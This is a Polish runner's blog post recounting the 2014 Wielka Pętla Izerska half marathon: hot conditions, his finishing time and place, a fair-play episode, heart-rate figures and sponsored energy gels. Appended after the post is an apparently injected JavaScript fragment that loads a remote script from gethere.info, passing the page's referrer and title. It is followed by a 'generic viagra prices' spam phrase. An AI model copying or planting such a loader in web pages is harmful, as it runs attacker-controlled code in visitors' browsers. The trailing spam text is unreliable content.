Wielka

21.07.2014 / Mariusz Cieśliński

Wielka Pętla Izerska 2014 przeszła do historii. Kilka słów na szybko po półmaratonie Wielka Pętla Izerska.

Miałem przyjemność zmierzyć się w miniony weekend z biegaczami.Byli wśród nich maratończycy,ultra maratończycy, biegacze narciarscy,triatloniści. Wszyscy,którzy zasuwają na na nogach szybko i zawodowo.

Na trasie-kamienie,kostka,szuter,asfalt,piasek i żmije.Prawdziwe.Wszystko jest dla ludzi:)

Czas zwycięzcy-chłopak z Ukrainy wykręcił czas 1h15′.Mój czas to 1h30’13”. 23 miejsce w generalce.Z chłopakami zajmującymi się biegami nie miałem najmniejszych szans :) ale pokonałem na tej samej trasie siebie samego o prawie 90sekund.

Wszyscy biegacze z którymi później miałem  okazję rozmawiać mówili o arcytrudnych warunkach na tym biegu.Temperatura(tzw.piekarnik) oraz sam wznos przez prawie 14km i późniejsze spadanie do mety na zmęczonych nogach.Cztery razy karetka na sygnale jechała po biegaczy,którym organizm się postawił i odmówił posłuszeństwa.Jeden z tych,który zasłabł był w ścisłym topie i padł niecały 1 km przed metą-na szczęście „tylko”odwodnienie. Postawa innego biegacza Beniamina Buszewskiego-był w stawce walki o pudło-jednak zatrzymał się .wezwał pomoc i został z padniętym jegomościem do przyjazdu karetki.Nagroda fair play i chyba największą owację otrzymał właśnie on na dekoracji.Dla mnie drugim bohaterem był ojciec i syn teamie „Maciek Biega” widoczni  na zdjęciach :)

Parę cyferek-podczas biegu średnie tętno moje to 176 ud/min – 95%hr max

Spaliłem 1731kcal .W dniu zawodów zużyłem kilka tubek żeli energetycznych z ACTION LINE Trec Nutrition. Rano władowałem powoli dwie saszetki CarboFull Gel popijając regularnie wodą i jedną saszetkę LongEnergyGel niemal bezpośrednio przed startem.Po minięciu linii mety czekała na mnie rodzina z RegenerationGel. Nr 3-z trójką na klacie biegłem w pętli.

Koszulka compression TRECWEAR spisała się bez zarzutu.

Sartowym był polski aktor Artur Żmijewski.Odpalone działo przez niego zrobiło wrażenie :)

Dla mnie takie ekstremalne warunki i wysiłek  były doskonałym treningiem przed KINGofKINGS World Grand Prix K-1 ,które 17.10.2014 odbędzie się w trójmiejskiej Ergo Arenie. Transmisja będzie w stacji Eurosport.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; }d.getElementsByTagName(‚head’)[0].appendChild(s); generic viagra prices